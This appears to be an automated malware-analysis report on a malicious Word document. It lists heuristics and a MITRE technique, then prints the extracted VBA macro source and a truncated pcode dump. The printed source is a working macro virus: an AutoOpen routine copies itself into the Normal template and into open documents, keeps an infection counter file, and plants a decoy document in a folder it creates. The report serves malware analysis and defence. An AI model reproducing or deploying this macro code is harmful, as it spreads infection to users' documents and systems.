Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The script attempts to copy itself to the Normal template and the active document, suggesting an intent to establish persistence or facilitate further infection. The specific family is not identifiable from the provided evidence.
Heuristics 3
- VBA macros detected (medium, 1 related finding) | OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) | OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8359 bytes |

SHA-256: bb5c7a0af75e14bc1e043444c872ffebf04251a59343fe5df44c1891cc473d93

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AddString"
'The Microsoft Word Language Visual Basic
'Copyright (c) 1999 Microsoft
'Todos os direitos reservados
Public pq As String
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Web.AddString.AutoOpen"
Call AddFile
Call AddNew
'Call MailNew
'Call Verday
End Sub
Sub AddNew()
Attribute AddNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AddNew.VB_ProcData.VB_Invoke_Func = "Web.AddString.AddNew"
Dim exec
exec = Counter()
On Error GoTo 0
Open pq + "\Death Kiss.Ini" For Output As #1
Print #1, exec + 1
Close #1
Doc = ActiveDocument.Path + "\" + ActiveDocument.Name
dot = NormalTemplate.FullName
On Error Resume Next
Application.OrganizerCopy Source:=Doc, _
Destination:=NormalTemplate.FullName, Name:="AddString", _
object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=Doc, _
Destination:=NormalTemplate.FullName, Name:="AddMail", _
object:=wdOrganizerObjectProjectItems
On Error GoTo 0
On Error Resume Next
Application.OrganizerCopy Source:=dot, _
Destination:=Doc, Name:="AddString", _
object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=dot, _
Destination:=ActiveDocument.Name, Name:="AddMail", _
object:=wdOrganizerObjectProjectItems
On Error GoTo 0
End Sub
Function Counter()
Dim exec
exec = ""
On Error Resume Next
Open pq + "\Death Kiss.Ini" For Input As #1
Input #1, exec
Close #1
On Error GoTo 0
Counter = Val(exec)
End Function
Function AddFile()
Dim meucar As String
cdir = CurDir()
On Error Resume Next
ChDir "\"
MkDir "\Windows"
On Error GoTo 0
On Error Resume Next
ChDir "\Windows"
MkDir "Application Users"
On Error GoTo 0
On Error Resume Next
ChDir "\Windows\Application Users"
MkDir "AddFile"
On Error GoTo 0
ChDir cdir
pq = "\Windows\Application Users\AddFile"
On Error GoTo 0
p = ActiveDocument.Path + "\Pesquisa de Opinião.doc"
If Counter() = 0 Then
On Error Resume Next
Open p For Binary As #1
Do While Meulocal < LOF(1)
meucar = meucar & Input(2048, #1)
Meulocal = Loc(1)
Loop
Close #1
Open pq + "\Pesquisa de Opinião.doc" For Binary Access Write As #1
Put #1, , meucar
Close #1
On Error GoTo 0
End If
End Function
' Processing file: /opt/analyzer/scan_staging/8554efea6f1a421a83ac1d277b1ba816.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 900 bytes
' Macros/VBA/AddString - 4803 bytes
' Line #0:
' QuoteRem 0x0000 0x0028 "The Microsoft Word Language Visual Basic"
' Line #1:
' QuoteRem 0x0000 0x001C "Copyright (c) 1999 Microsoft"
' Line #2:
' QuoteRem 0x0000 0x001C "Todos os direitos reservados"
' Line #3:
' Dim (Public)
' VarDefn pq (As String)
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' FuncDefn (Sub AutoOpen())
' Line #8:
' ArgsCall (Call) AddFile 0x0000
' Line #9:
' ArgsCall (Call) AddNew 0x0000
' Line #10:
' QuoteRem 0x0001 0x000C "Call MailNew"
' Line #11:
' QuoteRem 0x0001 0x000B "Call Verday"
' Line #12:
' EndSub
' Line #13:
' Line #14:
' FuncDefn (Sub AddNew())
' Line #15:
' Dim
' VarDefn exec
' Line #16:
' ArgsLd Counter 0x0000
' St exec
' Line #17:
' Line #18:
' OnError (GoTo 0)
' Line #19:
' Ld pq
' LitStr 0x000F "\Death Kiss.Ini"
' Add
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #20:
' LitDI2 0x0001
' Sharp
' PrintChan
' Ld exec
' LitDI2 0x0001
' Add
' PrintItemNL
' Line #21:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #22:
' Line #23:
' Ld ActiveDocument
' MemLd Path
' LitStr 0x00
... (truncated)